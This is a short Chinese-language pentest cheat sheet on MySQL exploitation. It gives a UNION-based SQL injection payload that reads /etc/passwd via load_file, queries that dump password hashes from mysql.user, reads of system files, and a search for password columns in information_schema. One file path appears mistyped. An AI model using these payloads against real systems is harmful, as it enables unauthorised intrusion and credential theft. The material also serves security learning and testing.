mysql 漏洞利用与提权

判断MySQL服务运行的权限

1、查看系统账号，如果出现MySQL这类用户，意味着系统可能出现了降权。

2、看mysqld运行的priority值。

3、查看端口是否可外联。

 

MySQL密码获取与破解

1、获取网站数据库账号和密码

2、获取MySQL数据库user表

用户一共有三个文件，即user.frm、user.MYD、user.MYI，MySQL数据库用户密码都保存在user.MYD文件中，包括root用户和其他用户密码。

 

MySQL密码查询

select user,password from mysql.user;

select user,password from mysql.user where user = 'root';

 

mysql 渗透技巧

如果发现一个PHP的SQL 注入点，可以通过构造"-1 union select 1,1,1,1,1,load_file('/etc/passwd')"

直接读取的配置文件的命令如下

select load_file('/etc/passwd')\

select load_file('/etc/issues')

select load_file('/etc/etc/rc.local')

 

一些常见的MySQL命令

show databases;

use testdatabases; 使用某个数据库

show tables;

select * from a 查询a表中所有的数据

select @@datadir;  查询数据库的路径

select @@basedir  查询mysql的安装路径

常用内置函数

select system_user() 查询系统

select current_user() 查询用户

select user() 查询用户

select version() 查询数据库版本

select database() 查询当前连接的数据库

select @@version_compile_os查询当前操作系统

select now() 显示当前时间

 

快速定位数据库中涉及的密码表

select table_schema,table_name,column_name from information_schema.columns where column_name like ‘%password%’;